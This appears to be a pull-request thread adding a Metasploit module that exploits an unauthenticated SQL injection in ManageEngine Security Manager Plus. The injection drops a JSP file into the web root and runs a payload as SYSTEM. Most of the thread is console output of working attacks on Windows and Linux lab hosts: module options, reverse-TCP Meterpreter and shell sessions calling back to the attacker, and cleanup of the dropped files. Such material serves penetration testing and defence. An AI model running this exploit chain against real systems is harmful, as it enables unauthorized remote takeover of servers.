Add ManageEngine Security Manager AdvanceSearch Module

[wchen-r7]

Originally based on xistence Metasploit PoC from Exploit-DB.

This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page. It will send a malicious SQL query to create a JSP file under the web root directory, and then let it download and execute our malicious executable under the context of SYSTEM. Authentication is not required in order to exploit this vulnerability.

Demo:

msf  exploit(manage_engine_sqli) > show options

Module options (exploit/windows/http/manage_engine_sqli):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        Use a proxy chain
   RHOST       10.0.1.6         yes       The target address
   RPORT       6262             yes       The target port
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   VHOST                        no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     10.0.1.3         yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf  exploit(manage_engine_sqli) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.1.3:4444 
msf  exploit(manage_engine_sqli) > [*] Serving executable on 0.0.0.0:8080
[*] Server started.
[*] 10.0.1.6:6262 - Sending JSP payload
[*] 10.0.1.6:6262 - Sending /hgPw.jsp
[*] 10.0.1.6:2750 - Sending executable (100045 bytes)
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.6:2751) at 2012-10-23 02:03:11 -0500
[!] 10.0.1.6:6262 - Deleting: hgPw.jsp
[+] 10.0.1.6:6262 - hgPw.jsp deleted

msf  exploit(manage_engine_sqli) >

[jlee-r7]

Verified working against current Windows trial installer from ManageEngine running on 2k3.

I don't like the design of having TcpServer serve up the payload. If that's the only way to do it, then fine, but I'd much rather see the payload delivered via the same mechanism as the exploit to improve reliability in the presence of firewalls and other pesky network devices.

[wchen-r7]

Done.

Tested against on Windows;

msf  exploit(manageengine_search_sqli) > show options

Module options (exploit/multi/http/manageengine_search_sqli):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    10.0.1.6         yes       The target address
   RPORT    6262             yes       The target port
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     10.0.1.3         yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf  exploit(manageengine_search_sqli) > exploit

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Sending JSP payload
[*] 10.0.1.6:6262 - Sending /bFGEaAPS.jsp
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.6:1927) at 2012-10-23 12:43:37 -0500
[!] 10.0.1.6:6262 - Deleting: bFGEaAPS.jsp
[+] 10.0.1.6:6262 - bFGEaAPS.jsp deleted

meterpreter >

New Linux target:

msf  exploit(manageengine_search_sqli) > show options

Module options (exploit/multi/http/manageengine_search_sqli):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    10.0.1.5         yes       The target address
   RPORT    6262             yes       The target port
   VHOST                     no        HTTP server virtual host


Payload options (linux/x86/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.1.3         yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf  exploit(manageengine_search_sqli) > exploit

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Sending JSP payload
[*] 10.0.1.5:6262 - Sending /rzae.jsp
[*] Command shell session 1 opened (10.0.1.3:4444 -> 10.0.1.5:38141) at 2012-10-23 12:45:10 -0500
[!] Meterpreter not used. Please manually remove rzae.jsp

id
uid=1000(sinn3r) gid=1000(sinn3r) groups=1000(sinn3r),4(adm),20(dialout),24(cdrom),46(plugdev),111(lpadmin),119(admin),122(sambashare

[jlee-r7]

no longer needed

[wchen-r7]

Examples demonstrating how the new cleanup function operates with different payloads:

Using windows/meterpreter/reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Sending JSP payload
[*] 10.0.1.6:6262 - Sending /GzfaOp.jsp
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 9 opened (10.0.1.3:4444 -> 10.0.1.6:3501) at 2012-10-23 13:48:27 -0500
[!] 10.0.1.6:6262 - Deleting: GzfaOp.jsp
[+] 10.0.1.6:6262 - GzfaOp.jsp deleted

Using windows/shell_reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Sending JSP payload
[*] 10.0.1.6:6262 - Sending /xpPDQ.jsp
[*] Command shell session 13 opened (10.0.1.3:4444 -> 10.0.1.6:3656) at 2012-10-23 13:54:38 -0500
[!] 10.0.1.6:6262 - Deleting: xpPDQ.jsp
[+] 10.0.1.6:6262 - xpPDQ.jsp deleted

Using linux/x86/meterpreter/reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Sending JSP payload
[*] 10.0.1.5:6262 - Sending /XQJj.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 10.0.1.5
[*] Meterpreter session 15 opened (10.0.1.3:4444 -> 10.0.1.5:38152) at 2012-10-23 13:57:00 -0500
[!] Malicious executable is removed during payload execution
[!] 10.0.1.5:6262 - Deleting: XQJj.jsp
[+] 10.0.1.5:6262 - XQJj.jsp deleted

Using linux/x86/shell_reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Sending JSP payload
[*] 10.0.1.5:6262 - Sending /NbsKVzCi.jsp
[*] Command shell session 16 opened (10.0.1.3:4444 -> 10.0.1.5:38153) at 2012-10-23 13:57:54 -0500
[!] Malicious executable is removed during payload execution
[!] 10.0.1.5:6262 - Deleting: NbsKVzCi.jsp
[+] 10.0.1.5:6262 - NbsKVzCi.jsp deleted

[wchen-r7]

Re-tested the module again after all the above changes. Demo:

Using linux/x86/shell_reverse_tcp (auto-target):

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Target selected: Linux
[*] 10.0.1.5:6262 - Trying SQL injection...
[*] 10.0.1.5:6262 - Requesting /srq.jsp
[*] Command shell session 1 opened (10.0.1.3:4444 -> 10.0.1.5:38191) at 2012-10-23 19:48:13 -0500
[!] 10.0.1.5:6262 - Deleting: "DfrNh.txt"
[+] 10.0.1.5:6262 - "DfrNh.txt" deleted
[!] 10.0.1.5:6262 - Deleting: "srq.jsp"
[+] 10.0.1.5:6262 - "srq.jsp" deleted

Using linux/x86/meterpreter/reverse_tcp (auto-target):

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.5:6262 - Target selected: Linux
[*] 10.0.1.5:6262 - Trying SQL injection...
[*] 10.0.1.5:6262 - Requesting /zSbtqvX.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 10.0.1.5
[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.5:38192) at 2012-10-23 19:49:31 -0500
[!] 10.0.1.5:6262 - Deleting: "FkZCo.txt"
[+] 10.0.1.5:6262 - "FkZCo.txt" deleted
[!] 10.0.1.5:6262 - Deleting: "zSbtqvX.jsp"
[+] 10.0.1.5:6262 - "zSbtqvX.jsp" deleted

meterpreter >

Using windows/meterpreter/reverse_tcp (auto-target):

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Target selected: Windows
[*] 10.0.1.6:6262 - Trying SQL injection...
[*] 10.0.1.6:6262 - Requesting /bZdbQX.jsp
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.6:1719) at 2012-10-23 19:50:50 -0500
[!] 10.0.1.6:6262 - Deleting: "PPocV.txt"
[+] 10.0.1.6:6262 - "PPocV.txt" deleted
[!] 10.0.1.6:6262 - Deleting: "bZdbQX.jsp"
[+] 10.0.1.6:6262 - "bZdbQX.jsp" deleted

meterpreter >

Using windows/shell_reverse_tcp:

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:6262 - Target selected: Windows
[*] 10.0.1.6:6262 - Trying SQL injection...
[*] 10.0.1.6:6262 - Requesting /XFRF.jsp
[*] Command shell session 4 opened (10.0.1.3:4444 -> 10.0.1.6:1738) at 2012-10-23 19:51:35 -0500
[!] 10.0.1.6:6262 - Deleting: "Hjkwa.txt"
[+] 10.0.1.6:6262 - "Hjkwa.txt" deleted
[!] 10.0.1.6:6262 - Deleting: "XFRF.jsp"
[+] 10.0.1.6:6262 - "XFRF.jsp" deleted

[wchen-r7]

I'm sorry, egypt... this code review/testing pace just isn't working out. I'm gonna push. Please file a ticket on redmine if you actually find a bug later.